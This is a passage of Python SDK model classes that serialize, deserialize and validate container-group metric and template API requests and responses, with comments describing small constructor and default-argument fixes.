    """Memory spec fields of a container (limit/reservation/swap_limit)."""
    def __init__(self, limit=None, reservation=None, swap_limit=None):
        self.limit = limit
        self.reservation = reservation
        self.swap_limit = swap_limit
    def validate(self):
        """Require every field to be present."""
        for value, name in (
                (self.limit, 'limit'),
                (self.reservation, 'reservation'),
                (self.swap_limit, 'swap_limit')):
            self.validate_required(value, name)
    def to_map(self):
        """Serialize to an API-style dict."""
        return {
            'Limit': self.limit,
            'Reservation': self.reservation,
            'SwapLimit': self.swap_limit,
        }
    def from_map(self, map=None):
        """Populate from an API-style dict; returns self."""
        # None default avoids the shared mutable-default pitfall of `map={}`.
        map = map if map is not None else {}
        self.limit = map.get('Limit')
        self.reservation = map.get('Reservation')
        self.swap_limit = map.get('SwapLimit')
        return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerSpec(TeaModel):
    """Container spec: capability flags, image/labels/envs, plus cpu/memory sub-models."""
    def __init__(self, creation_time=None, has_cpu=None, has_memory=None, has_network=None, has_filesystem=None, has_disk_io=None, has_custom_metrics=None, image=None, labels=None, envs=None, container_cpu=None, container_memory=None):
        self.creation_time = creation_time
        self.has_cpu = has_cpu
        self.has_memory = has_memory
        self.has_network = has_network
        self.has_filesystem = has_filesystem
        self.has_disk_io = has_disk_io
        self.has_custom_metrics = has_custom_metrics
        self.image = image
        self.labels = labels
        self.envs = envs
        # Nested sub-models, validated and serialized recursively below.
        self.container_cpu = container_cpu
        self.container_memory = container_memory
    def validate(self):
        """Require every field; recurse into the nested sub-models."""
        for value, name in (
                (self.creation_time, 'creation_time'),
                (self.has_cpu, 'has_cpu'),
                (self.has_memory, 'has_memory'),
                (self.has_network, 'has_network'),
                (self.has_filesystem, 'has_filesystem'),
                (self.has_disk_io, 'has_disk_io'),
                (self.has_custom_metrics, 'has_custom_metrics'),
                (self.image, 'image'),
                (self.labels, 'labels'),
                (self.envs, 'envs')):
            self.validate_required(value, name)
        self.validate_required(self.container_cpu, 'container_cpu')
        if self.container_cpu:
            self.container_cpu.validate()
        self.validate_required(self.container_memory, 'container_memory')
        if self.container_memory:
            self.container_memory.validate()
    def to_map(self):
        """Serialize to an API-style dict; nested models via their to_map()."""
        result = {
            'CreationTime': self.creation_time,
            'HasCpu': self.has_cpu,
            'HasMemory': self.has_memory,
            'HasNetwork': self.has_network,
            'HasFilesystem': self.has_filesystem,
            'HasDiskIo': self.has_disk_io,
            'HasCustomMetrics': self.has_custom_metrics,
            'Image': self.image,
            'Labels': self.labels,
            'Envs': self.envs,
        }
        result['ContainerCpu'] = self.container_cpu.to_map() if self.container_cpu is not None else None
        result['ContainerMemory'] = self.container_memory.to_map() if self.container_memory is not None else None
        return result
    def from_map(self, map=None):
        """Populate from an API-style dict; returns self."""
        # None default avoids the shared mutable-default pitfall of `map={}`.
        map = map if map is not None else {}
        self.creation_time = map.get('CreationTime')
        self.has_cpu = map.get('HasCpu')
        self.has_memory = map.get('HasMemory')
        self.has_network = map.get('HasNetwork')
        self.has_filesystem = map.get('HasFilesystem')
        self.has_disk_io = map.get('HasDiskIo')
        self.has_custom_metrics = map.get('HasCustomMetrics')
        self.image = map.get('Image')
        self.labels = map.get('Labels')
        self.envs = map.get('Envs')
        if map.get('ContainerCpu') is not None:
            self.container_cpu = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerSpecContainerCpu().from_map(map['ContainerCpu'])
        else:
            self.container_cpu = None
        if map.get('ContainerMemory') is not None:
            self.container_memory = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerSpecContainerMemory().from_map(map['ContainerMemory'])
        else:
            self.container_memory = None
        return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfos(TeaModel):
    """Per-container info: identity fields, stats samples, spec, and alias strings."""
    def __init__(self, id=None, name=None, namespace=None, labels=None, container_stats=None, container_spec=None, aliases=None):
        self.id = id
        self.name = name
        self.namespace = namespace
        self.labels = labels
        # BUG FIX: the generated code discarded the `container_stats` and
        # `aliases` arguments and always assigned []. Honor them; the
        # no-argument default stays [].
        self.container_stats = container_stats if container_stats is not None else []
        self.container_spec = container_spec
        self.aliases = aliases if aliases is not None else []
    def validate(self):
        """Require every field; recurse into stats items and the spec."""
        for value, name in (
                (self.id, 'id'),
                (self.name, 'name'),
                (self.namespace, 'namespace'),
                (self.labels, 'labels')):
            self.validate_required(value, name)
        self.validate_required(self.container_stats, 'container_stats')
        if self.container_stats:
            for item in self.container_stats:
                if item:
                    item.validate()
        self.validate_required(self.container_spec, 'container_spec')
        if self.container_spec:
            self.container_spec.validate()
        # aliases are plain values; only presence is checked.
        self.validate_required(self.aliases, 'aliases')
    def to_map(self):
        """Serialize to an API-style dict; nested models via their to_map()."""
        result = {
            'Id': self.id,
            'Name': self.name,
            'Namespace': self.namespace,
            'Labels': self.labels,
        }
        if self.container_stats is None:
            result['ContainerStats'] = None
        else:
            result['ContainerStats'] = [item.to_map() if item else None for item in self.container_stats]
        result['ContainerSpec'] = self.container_spec.to_map() if self.container_spec is not None else None
        result['Aliases'] = list(self.aliases) if self.aliases is not None else None
        return result
    def from_map(self, map=None):
        """Populate from an API-style dict; returns self."""
        # None default avoids the shared mutable-default pitfall of `map={}`.
        map = map if map is not None else {}
        self.id = map.get('Id')
        self.name = map.get('Name')
        self.namespace = map.get('Namespace')
        self.labels = map.get('Labels')
        if map.get('ContainerStats') is not None:
            self.container_stats = [
                DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStats().from_map(k)
                for k in map.get('ContainerStats')
            ]
        else:
            self.container_stats = None
        if map.get('ContainerSpec') is not None:
            self.container_spec = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerSpec().from_map(map['ContainerSpec'])
        else:
            self.container_spec = None
        if map.get('Aliases') is not None:
            self.aliases = list(map.get('Aliases'))
        else:
            self.aliases = None
        return self
class DescribeMultiContainerGroupMetricResponseMonitorDatas(TeaModel):
    """One container group's monitor data: id plus record and container-info lists."""
    def __init__(self, container_group_id=None, records=None, container_infos=None):
        self.container_group_id = container_group_id
        # BUG FIX: the generated code discarded the `records` and
        # `container_infos` arguments and always assigned []. Honor
        # them; the no-argument default stays [].
        self.records = records if records is not None else []
        self.container_infos = container_infos if container_infos is not None else []
    def validate(self):
        """Require every field; recurse into list items."""
        self.validate_required(self.container_group_id, 'container_group_id')
        self.validate_required(self.records, 'records')
        if self.records:
            for item in self.records:
                if item:
                    item.validate()
        self.validate_required(self.container_infos, 'container_infos')
        if self.container_infos:
            for item in self.container_infos:
                if item:
                    item.validate()
    def to_map(self):
        """Serialize to an API-style dict; list items via their to_map()."""
        result = {'ContainerGroupId': self.container_group_id}
        if self.records is None:
            result['Records'] = None
        else:
            result['Records'] = [item.to_map() if item else None for item in self.records]
        if self.container_infos is None:
            result['ContainerInfos'] = None
        else:
            result['ContainerInfos'] = [item.to_map() if item else None for item in self.container_infos]
        return result
    def from_map(self, map=None):
        """Populate from an API-style dict; returns self."""
        # None default avoids the shared mutable-default pitfall of `map={}`.
        map = map if map is not None else {}
        self.container_group_id = map.get('ContainerGroupId')
        if map.get('Records') is not None:
            self.records = [
                DescribeMultiContainerGroupMetricResponseMonitorDatasRecords().from_map(k)
                for k in map.get('Records')
            ]
        else:
            self.records = None
        if map.get('ContainerInfos') is not None:
            self.container_infos = [
                DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfos().from_map(k)
                for k in map.get('ContainerInfos')
            ]
        else:
            self.container_infos = None
        return self
class DescribeContainerGroupMetricRequest(TeaModel):
    """Request model for DescribeContainerGroupMetric.

    Only region_id and container_group_id are required; start_time,
    end_time, and period are optional query parameters.
    """
    def __init__(self, region_id=None, container_group_id=None, start_time=None, end_time=None, period=None):
        self.region_id = region_id
        self.container_group_id = container_group_id
        self.start_time = start_time
        self.end_time = end_time
        self.period = period
    def validate(self):
        """Require the two mandatory identifiers."""
        self.validate_required(self.region_id, 'region_id')
        self.validate_required(self.container_group_id, 'container_group_id')
    def to_map(self):
        """Serialize to an API-style dict."""
        return {
            'RegionId': self.region_id,
            'ContainerGroupId': self.container_group_id,
            'StartTime': self.start_time,
            'EndTime': self.end_time,
            'Period': self.period,
        }
    def from_map(self, map=None):
        """Populate from an API-style dict; returns self."""
        # None default avoids the shared mutable-default pitfall of `map={}`.
        map = map if map is not None else {}
        self.region_id = map.get('RegionId')
        self.container_group_id = map.get('ContainerGroupId')
        self.start_time = map.get('StartTime')
        self.end_time = map.get('EndTime')
        self.period = map.get('Period')
        return self
class DescribeContainerGroupMetricResponse(TeaModel):
    """Response of DescribeContainerGroupMetric: request id, group id and metric records.

    Fix: the ``records`` constructor argument was previously ignored (the
    attribute was unconditionally reset to ``[]``); it is now honored.
    """
    def __init__(self, request_id=None, container_group_id=None, records=None):
        self.request_id = request_id
        self.container_group_id = container_group_id
        # List of DescribeContainerGroupMetricResponseRecords models.
        self.records = records if records is not None else []
    def validate(self):
        """Check required fields and recursively validate each record."""
        self.validate_required(self.request_id, 'request_id')
        self.validate_required(self.container_group_id, 'container_group_id')
        self.validate_required(self.records, 'records')
        if self.records:
            for k in self.records:
                if k:
                    k.validate()
    def to_map(self):
        """Serialize to a wire-format dict; records are serialized recursively."""
        result = {}
        result['RequestId'] = self.request_id
        result['ContainerGroupId'] = self.container_group_id
        if self.records is not None:
            result['Records'] = [k.to_map() if k else None for k in self.records]
        else:
            result['Records'] = None
        return result
    def from_map(self, map=None):
        """Populate from a wire-format dict and return self (mutable-default fixed)."""
        map = map or {}
        self.request_id = map.get('RequestId')
        self.container_group_id = map.get('ContainerGroupId')
        if map.get('Records') is not None:
            self.records = [
                DescribeContainerGroupMetricResponseRecords().from_map(k)
                for k in map.get('Records')
            ]
        else:
            self.records = None
        return self
class DescribeContainerGroupMetricResponseRecordsContainersCPU(TeaModel):
    """Per-container CPU metrics within a metric record."""
    def __init__(self, usage_nano_cores=None, usage_core_nano_seconds=None, load=None, limit=None):
        self.usage_nano_cores = usage_nano_cores
        self.usage_core_nano_seconds = usage_core_nano_seconds
        self.load = load
        self.limit = limit
    def validate(self):
        """All four metrics are required."""
        for value, label in ((self.usage_nano_cores, 'usage_nano_cores'),
                             (self.usage_core_nano_seconds, 'usage_core_nano_seconds'),
                             (self.load, 'load'),
                             (self.limit, 'limit')):
            self.validate_required(value, label)
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {
            'UsageNanoCores': self.usage_nano_cores,
            'UsageCoreNanoSeconds': self.usage_core_nano_seconds,
            'Load': self.load,
            'Limit': self.limit,
        }
    def from_map(self, map={}):
        """Populate fields from a wire-format dict and return self."""
        self.usage_nano_cores = map.get('UsageNanoCores')
        self.usage_core_nano_seconds = map.get('UsageCoreNanoSeconds')
        self.load = map.get('Load')
        self.limit = map.get('Limit')
        return self
class DescribeContainerGroupMetricResponseRecordsContainersMemory(TeaModel):
    """Per-container memory metrics within a metric record."""
    def __init__(self, available_bytes=None, usage_bytes=None, cache=None, working_set=None, rss=None):
        self.available_bytes = available_bytes
        self.usage_bytes = usage_bytes
        self.cache = cache
        self.working_set = working_set
        self.rss = rss
    def validate(self):
        """All five metrics are required."""
        for value, label in ((self.available_bytes, 'available_bytes'),
                             (self.usage_bytes, 'usage_bytes'),
                             (self.cache, 'cache'),
                             (self.working_set, 'working_set'),
                             (self.rss, 'rss')):
            self.validate_required(value, label)
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {
            'AvailableBytes': self.available_bytes,
            'UsageBytes': self.usage_bytes,
            'Cache': self.cache,
            'WorkingSet': self.working_set,
            'Rss': self.rss,
        }
    def from_map(self, map={}):
        """Populate fields from a wire-format dict and return self."""
        self.available_bytes = map.get('AvailableBytes')
        self.usage_bytes = map.get('UsageBytes')
        self.cache = map.get('Cache')
        self.working_set = map.get('WorkingSet')
        self.rss = map.get('Rss')
        return self
class DescribeContainerGroupMetricResponseRecordsContainers(TeaModel):
    """A single container's metrics: name plus nested CPU and memory models."""
    def __init__(self, name=None, _cpu=None, memory=None):
        self.name = name
        self._cpu = _cpu
        self.memory = memory
    def validate(self):
        """All fields are required; nested models are validated recursively."""
        self.validate_required(self.name, 'name')
        for child, label in ((self._cpu, '_cpu'), (self.memory, 'memory')):
            self.validate_required(child, label)
            if child:
                child.validate()
    def to_map(self):
        """Serialize to a wire-format dict; nested models serialize recursively."""
        return {
            'Name': self.name,
            'CPU': self._cpu.to_map() if self._cpu is not None else None,
            'Memory': self.memory.to_map() if self.memory is not None else None,
        }
    def from_map(self, map={}):
        """Populate fields (including nested models) from a wire dict; return self."""
        self.name = map.get('Name')
        cpu_map = map.get('CPU')
        self._cpu = (DescribeContainerGroupMetricResponseRecordsContainersCPU().from_map(cpu_map)
                     if cpu_map is not None else None)
        memory_map = map.get('Memory')
        self.memory = (DescribeContainerGroupMetricResponseRecordsContainersMemory().from_map(memory_map)
                       if memory_map is not None else None)
        return self
class DescribeContainerGroupMetricResponseRecordsCPU(TeaModel):
    """Group-level CPU metrics within a metric record."""
    def __init__(self, usage_nano_cores=None, usage_core_nano_seconds=None, load=None, limit=None):
        self.usage_nano_cores = usage_nano_cores
        self.usage_core_nano_seconds = usage_core_nano_seconds
        self.load = load
        self.limit = limit
    def validate(self):
        """All four metrics are required."""
        for value, label in ((self.usage_nano_cores, 'usage_nano_cores'),
                             (self.usage_core_nano_seconds, 'usage_core_nano_seconds'),
                             (self.load, 'load'),
                             (self.limit, 'limit')):
            self.validate_required(value, label)
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {
            'UsageNanoCores': self.usage_nano_cores,
            'UsageCoreNanoSeconds': self.usage_core_nano_seconds,
            'Load': self.load,
            'Limit': self.limit,
        }
    def from_map(self, map={}):
        """Populate fields from a wire-format dict and return self."""
        self.usage_nano_cores = map.get('UsageNanoCores')
        self.usage_core_nano_seconds = map.get('UsageCoreNanoSeconds')
        self.load = map.get('Load')
        self.limit = map.get('Limit')
        return self
class DescribeContainerGroupMetricResponseRecordsMemory(TeaModel):
    """Group-level memory metrics within a metric record."""
    def __init__(self, available_bytes=None, usage_bytes=None, cache=None, working_set=None, rss=None):
        self.available_bytes = available_bytes
        self.usage_bytes = usage_bytes
        self.cache = cache
        self.working_set = working_set
        self.rss = rss
    def validate(self):
        """All five metrics are required."""
        for value, label in ((self.available_bytes, 'available_bytes'),
                             (self.usage_bytes, 'usage_bytes'),
                             (self.cache, 'cache'),
                             (self.working_set, 'working_set'),
                             (self.rss, 'rss')):
            self.validate_required(value, label)
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {
            'AvailableBytes': self.available_bytes,
            'UsageBytes': self.usage_bytes,
            'Cache': self.cache,
            'WorkingSet': self.working_set,
            'Rss': self.rss,
        }
    def from_map(self, map={}):
        """Populate fields from a wire-format dict and return self."""
        self.available_bytes = map.get('AvailableBytes')
        self.usage_bytes = map.get('UsageBytes')
        self.cache = map.get('Cache')
        self.working_set = map.get('WorkingSet')
        self.rss = map.get('Rss')
        return self
class DescribeContainerGroupMetricResponseRecordsNetworkInterfaces(TeaModel):
    """Traffic counters for one network interface of a container group."""
    def __init__(self, tx_bytes=None, rx_bytes=None, tx_errors=None, rx_errors=None, name=None):
        self.tx_bytes = tx_bytes
        self.rx_bytes = rx_bytes
        self.tx_errors = tx_errors
        self.rx_errors = rx_errors
        self.name = name
    def validate(self):
        """All counters and the interface name are required."""
        for value, label in ((self.tx_bytes, 'tx_bytes'),
                             (self.rx_bytes, 'rx_bytes'),
                             (self.tx_errors, 'tx_errors'),
                             (self.rx_errors, 'rx_errors'),
                             (self.name, 'name')):
            self.validate_required(value, label)
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {
            'TxBytes': self.tx_bytes,
            'RxBytes': self.rx_bytes,
            'TxErrors': self.tx_errors,
            'RxErrors': self.rx_errors,
            'Name': self.name,
        }
    def from_map(self, map={}):
        """Populate fields from a wire-format dict and return self."""
        self.tx_bytes = map.get('TxBytes')
        self.rx_bytes = map.get('RxBytes')
        self.tx_errors = map.get('TxErrors')
        self.rx_errors = map.get('RxErrors')
        self.name = map.get('Name')
        return self
class DescribeContainerGroupMetricResponseRecordsNetwork(TeaModel):
    """Network metrics of a metric record: a list of interface counters.

    Fix: the ``interfaces`` constructor argument was previously ignored (the
    attribute was unconditionally reset to ``[]``); it is now honored.
    """
    def __init__(self, interfaces=None):
        # List of ...RecordsNetworkInterfaces models.
        self.interfaces = interfaces if interfaces is not None else []
    def validate(self):
        """Check the list is present and validate each entry recursively."""
        self.validate_required(self.interfaces, 'interfaces')
        if self.interfaces:
            for k in self.interfaces:
                if k:
                    k.validate()
    def to_map(self):
        """Serialize to a wire-format dict; entries are serialized recursively."""
        result = {}
        if self.interfaces is not None:
            result['Interfaces'] = [k.to_map() if k else None for k in self.interfaces]
        else:
            result['Interfaces'] = None
        return result
    def from_map(self, map=None):
        """Populate from a wire-format dict and return self (mutable-default fixed)."""
        map = map or {}
        if map.get('Interfaces') is not None:
            self.interfaces = [
                DescribeContainerGroupMetricResponseRecordsNetworkInterfaces().from_map(k)
                for k in map.get('Interfaces')
            ]
        else:
            self.interfaces = None
        return self
class DescribeContainerGroupMetricResponseRecords(TeaModel):
    """One metric sample: timestamp, per-container metrics, and group CPU/memory/network.

    Fix: the ``containers`` constructor argument was previously ignored (the
    attribute was unconditionally reset to ``[]``); it is now honored.
    """
    def __init__(self, timestamp=None, containers=None, _cpu=None, memory=None, network=None):
        self.timestamp = timestamp
        # List of ...RecordsContainers models.
        self.containers = containers if containers is not None else []
        self._cpu = _cpu
        self.memory = memory
        self.network = network
    def validate(self):
        """Check required fields and recursively validate nested models."""
        self.validate_required(self.timestamp, 'timestamp')
        self.validate_required(self.containers, 'containers')
        if self.containers:
            for k in self.containers:
                if k:
                    k.validate()
        self.validate_required(self._cpu, '_cpu')
        if self._cpu:
            self._cpu.validate()
        self.validate_required(self.memory, 'memory')
        if self.memory:
            self.memory.validate()
        self.validate_required(self.network, 'network')
        if self.network:
            self.network.validate()
    def to_map(self):
        """Serialize to a wire-format dict; nested models serialize recursively."""
        result = {}
        result['Timestamp'] = self.timestamp
        if self.containers is not None:
            result['Containers'] = [k.to_map() if k else None for k in self.containers]
        else:
            result['Containers'] = None
        result['CPU'] = self._cpu.to_map() if self._cpu is not None else None
        result['Memory'] = self.memory.to_map() if self.memory is not None else None
        result['Network'] = self.network.to_map() if self.network is not None else None
        return result
    def from_map(self, map=None):
        """Populate from a wire-format dict and return self (mutable-default fixed)."""
        map = map or {}
        self.timestamp = map.get('Timestamp')
        if map.get('Containers') is not None:
            self.containers = [
                DescribeContainerGroupMetricResponseRecordsContainers().from_map(k)
                for k in map.get('Containers')
            ]
        else:
            self.containers = None
        if map.get('CPU') is not None:
            self._cpu = DescribeContainerGroupMetricResponseRecordsCPU().from_map(map['CPU'])
        else:
            self._cpu = None
        if map.get('Memory') is not None:
            self.memory = DescribeContainerGroupMetricResponseRecordsMemory().from_map(map['Memory'])
        else:
            self.memory = None
        if map.get('Network') is not None:
            self.network = DescribeContainerGroupMetricResponseRecordsNetwork().from_map(map['Network'])
        else:
            self.network = None
        return self
class UpdateContainerGroupByTemplateRequest(TeaModel):
    """Request parameters for the UpdateContainerGroupByTemplate API."""
    def __init__(self, region_id=None, template=None, client_token=None):
        self.region_id = region_id
        self.template = template
        self.client_token = client_token  # idempotency token; optional
    def validate(self):
        """Region id and template are mandatory."""
        for value, label in ((self.region_id, 'region_id'),
                             (self.template, 'template')):
            self.validate_required(value, label)
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {
            'RegionId': self.region_id,
            'Template': self.template,
            'ClientToken': self.client_token,
        }
    def from_map(self, map={}):
        """Populate fields from a wire-format dict and return self."""
        self.region_id = map.get('RegionId')
        self.template = map.get('Template')
        self.client_token = map.get('ClientToken')
        return self
class UpdateContainerGroupByTemplateResponse(TeaModel):
    """Response of UpdateContainerGroupByTemplate: only the request id."""
    def __init__(self, request_id=None):
        self.request_id = request_id
    def validate(self):
        """The request id is mandatory."""
        self.validate_required(self.request_id, 'request_id')
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {'RequestId': self.request_id}
    def from_map(self, map={}):
        """Populate fields from a wire-format dict and return self."""
        self.request_id = map.get('RequestId')
        return self
class CreateContainerGroupFromTemplateRequest(TeaModel):
    """Request parameters for the CreateContainerGroupFromTemplate API."""
    def __init__(self, region_id=None, template=None, client_token=None):
        self.region_id = region_id
        self.template = template
        self.client_token = client_token  # idempotency token; optional
    def validate(self):
        """Region id and template are mandatory."""
        for value, label in ((self.region_id, 'region_id'),
                             (self.template, 'template')):
            self.validate_required(value, label)
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {
            'RegionId': self.region_id,
            'Template': self.template,
            'ClientToken': self.client_token,
        }
    def from_map(self, map={}):
        """Populate fields from a wire-format dict and return self."""
        self.region_id = map.get('RegionId')
        self.template = map.get('Template')
        self.client_token = map.get('ClientToken')
        return self
class CreateContainerGroupFromTemplateResponse(TeaModel):
    """Response of CreateContainerGroupFromTemplate: request id and new group id."""
    def __init__(self, request_id=None, container_group_id=None):
        self.request_id = request_id
        self.container_group_id = container_group_id
    def validate(self):
        """Both identifiers are mandatory."""
        for value, label in ((self.request_id, 'request_id'),
                             (self.container_group_id, 'container_group_id')):
            self.validate_required(value, label)
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {
            'RequestId': self.request_id,
            'ContainerGroupId': self.container_group_id,
        }
    def from_map(self, map={}):
        """Populate fields from a wire-format dict and return self."""
        self.request_id = map.get('RequestId')
        self.container_group_id = map.get('ContainerGroupId')
        return self
class ExportContainerGroupTemplateRequest(TeaModel):
    """Request parameters for the ExportContainerGroupTemplate API."""
    def __init__(self, region_id=None, container_group_id=None):
        self.region_id = region_id
        self.container_group_id = container_group_id
    def validate(self):
        """No required-field constraints for this request."""
        pass
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {
            'RegionId': self.region_id,
            'ContainerGroupId': self.container_group_id,
        }
    def from_map(self, map={}):
        """Populate fields from a wire-format dict and return self."""
        self.region_id = map.get('RegionId')
        self.container_group_id = map.get('ContainerGroupId')
        return self
class ExportContainerGroupTemplateResponse(TeaModel):
    """Response of ExportContainerGroupTemplate: request id plus a template model."""
    def __init__(self, request_id=None, template=None):
        self.request_id = request_id
        self.template = template  # ExportContainerGroupTemplateResponseTemplate model
    def validate(self):
        """Both fields are required; the template is validated recursively."""
        self.validate_required(self.request_id, 'request_id')
        self.validate_required(self.template, 'template')
        if self.template:
            self.template.validate()
    def to_map(self):
        """Serialize to a wire-format dict; the template serializes recursively."""
        return {
            'RequestId': self.request_id,
            'Template': self.template.to_map() if self.template is not None else None,
        }
    def from_map(self, map={}):
        """Populate fields (including the nested template) from a wire dict; return self."""
        self.request_id = map.get('RequestId')
        template_map = map.get('Template')
        self.template = (ExportContainerGroupTemplateResponseTemplate().from_map(template_map)
                         if template_map is not None else None)
        return self
class ExportContainerGroupTemplateResponseTemplateTags(TeaModel):
    """A key/value tag attached to an exported template."""
    def __init__(self, key=None, value=None):
        self.key = key
        self.value = value
    def validate(self):
        """Key and value are both required."""
        for value, label in ((self.key, 'key'), (self.value, 'value')):
            self.validate_required(value, label)
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {'Key': self.key, 'Value': self.value}
    def from_map(self, map={}):
        """Populate fields from a wire-format dict and return self."""
        self.key = map.get('Key')
        self.value = map.get('Value')
        return self
class ExportContainerGroupTemplateResponseTemplateResources(TeaModel):
    """Group-level resource request of an exported template (CPU and memory)."""
    def __init__(self, cpu=None, memory=None):
        self.cpu = cpu
        self.memory = memory
    def validate(self):
        """Both resource amounts are required."""
        for value, label in ((self.cpu, 'cpu'), (self.memory, 'memory')):
            self.validate_required(value, label)
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {'Cpu': self.cpu, 'Memory': self.memory}
    def from_map(self, map={}):
        """Populate fields from a wire-format dict and return self."""
        self.cpu = map.get('Cpu')
        self.memory = map.get('Memory')
        return self
class ExportContainerGroupTemplateResponseTemplateSpecVolumesConfigFileItems(TeaModel):
    """One entry of a config-file volume: file mode, path, and content."""
    def __init__(self, mode=None, path=None, content=None):
        self.mode = mode
        self.path = path
        self.content = content
    def validate(self):
        """All three fields are required."""
        for value, label in ((self.mode, 'mode'),
                             (self.path, 'path'),
                             (self.content, 'content')):
            self.validate_required(value, label)
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {
            'Mode': self.mode,
            'Path': self.path,
            'Content': self.content,
        }
    def from_map(self, map={}):
        """Populate fields from a wire-format dict and return self."""
        self.mode = map.get('Mode')
        self.path = map.get('Path')
        self.content = map.get('Content')
        return self
class ExportContainerGroupTemplateResponseTemplateSpecVolumesConfigFile(TeaModel):
    """A config-file volume: default file mode plus a list of file items.

    Fix: the ``items`` constructor argument was previously ignored (the
    attribute was unconditionally reset to ``[]``); it is now honored.
    """
    def __init__(self, default_mode=None, items=None):
        self.default_mode = default_mode
        # List of ...ConfigFileItems models.
        self.items = items if items is not None else []
    def validate(self):
        """Check required fields and recursively validate each item."""
        self.validate_required(self.default_mode, 'default_mode')
        self.validate_required(self.items, 'items')
        if self.items:
            for k in self.items:
                if k:
                    k.validate()
    def to_map(self):
        """Serialize to a wire-format dict; items are serialized recursively."""
        result = {}
        result['DefaultMode'] = self.default_mode
        if self.items is not None:
            result['Items'] = [k.to_map() if k else None for k in self.items]
        else:
            result['Items'] = None
        return result
    def from_map(self, map=None):
        """Populate from a wire-format dict and return self (mutable-default fixed)."""
        map = map or {}
        self.default_mode = map.get('DefaultMode')
        if map.get('Items') is not None:
            self.items = [
                ExportContainerGroupTemplateResponseTemplateSpecVolumesConfigFileItems().from_map(k)
                for k in map.get('Items')
            ]
        else:
            self.items = None
        return self
class ExportContainerGroupTemplateResponseTemplateSpecVolumesEmptyDir(TeaModel):
    """An emptyDir volume definition with its size limit."""
    def __init__(self, size_limit=None):
        self.size_limit = size_limit
    def validate(self):
        """The size limit is required."""
        self.validate_required(self.size_limit, 'size_limit')
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {'SizeLimit': self.size_limit}
    def from_map(self, map={}):
        """Populate fields from a wire-format dict and return self."""
        self.size_limit = map.get('SizeLimit')
        return self
class ExportContainerGroupTemplateResponseTemplateSpecVolumesNfs(TeaModel):
    """An NFS volume definition: server address, export path, read-only flag."""
    def __init__(self, server=None, path=None, read_only=None):
        self.server = server
        self.path = path
        self.read_only = read_only
    def validate(self):
        """All three fields are required."""
        for value, label in ((self.server, 'server'),
                             (self.path, 'path'),
                             (self.read_only, 'read_only')):
            self.validate_required(value, label)
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {
            'Server': self.server,
            'Path': self.path,
            'ReadOnly': self.read_only,
        }
    def from_map(self, map={}):
        """Populate fields from a wire-format dict and return self."""
        self.server = map.get('Server')
        self.path = map.get('Path')
        self.read_only = map.get('ReadOnly')
        return self
class ExportContainerGroupTemplateResponseTemplateSpecVolumes(TeaModel):
    """A volume of an exported template: name plus config-file/emptyDir/NFS variants."""
    def __init__(self, name=None, config_file=None, empty_dir=None, nfs=None):
        self.name = name
        self.config_file = config_file
        self.empty_dir = empty_dir
        self.nfs = nfs
    def validate(self):
        """All fields are required; nested volume models validate recursively."""
        self.validate_required(self.name, 'name')
        for child, label in ((self.config_file, 'config_file'),
                             (self.empty_dir, 'empty_dir'),
                             (self.nfs, 'nfs')):
            self.validate_required(child, label)
            if child:
                child.validate()
    def to_map(self):
        """Serialize to a wire-format dict; nested models serialize recursively."""
        return {
            'Name': self.name,
            'ConfigFile': self.config_file.to_map() if self.config_file is not None else None,
            'EmptyDir': self.empty_dir.to_map() if self.empty_dir is not None else None,
            'Nfs': self.nfs.to_map() if self.nfs is not None else None,
        }
    def from_map(self, map={}):
        """Populate fields (including nested models) from a wire dict; return self."""
        self.name = map.get('Name')
        config_file_map = map.get('ConfigFile')
        self.config_file = (
            ExportContainerGroupTemplateResponseTemplateSpecVolumesConfigFile().from_map(config_file_map)
            if config_file_map is not None else None)
        empty_dir_map = map.get('EmptyDir')
        self.empty_dir = (
            ExportContainerGroupTemplateResponseTemplateSpecVolumesEmptyDir().from_map(empty_dir_map)
            if empty_dir_map is not None else None)
        nfs_map = map.get('Nfs')
        self.nfs = (
            ExportContainerGroupTemplateResponseTemplateSpecVolumesNfs().from_map(nfs_map)
            if nfs_map is not None else None)
        return self
class ExportContainerGroupTemplateResponseTemplateSpecInitContainersEnvValueFromFieldRef(TeaModel):
    """A field reference used as an env-var source (init containers)."""
    def __init__(self, field_path=None):
        self.field_path = field_path
    def validate(self):
        """The field path is required."""
        self.validate_required(self.field_path, 'field_path')
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {'FieldPath': self.field_path}
    def from_map(self, map={}):
        """Populate fields from a wire-format dict and return self."""
        self.field_path = map.get('FieldPath')
        return self
class ExportContainerGroupTemplateResponseTemplateSpecInitContainersEnvValueFrom(TeaModel):
    """An env-var value source wrapping a field reference (init containers)."""
    def __init__(self, field_ref=None):
        self.field_ref = field_ref
    def validate(self):
        """The field reference is required and validated recursively."""
        self.validate_required(self.field_ref, 'field_ref')
        if self.field_ref:
            self.field_ref.validate()
    def to_map(self):
        """Serialize to a wire-format dict; the reference serializes recursively."""
        return {'FieldRef': self.field_ref.to_map() if self.field_ref is not None else None}
    def from_map(self, map={}):
        """Populate the nested reference from a wire dict; return self."""
        field_ref_map = map.get('FieldRef')
        self.field_ref = (
            ExportContainerGroupTemplateResponseTemplateSpecInitContainersEnvValueFromFieldRef().from_map(field_ref_map)
            if field_ref_map is not None else None)
        return self
class ExportContainerGroupTemplateResponseTemplateSpecInitContainersEnv(TeaModel):
    """An environment variable of an init container: name, literal value, or source."""
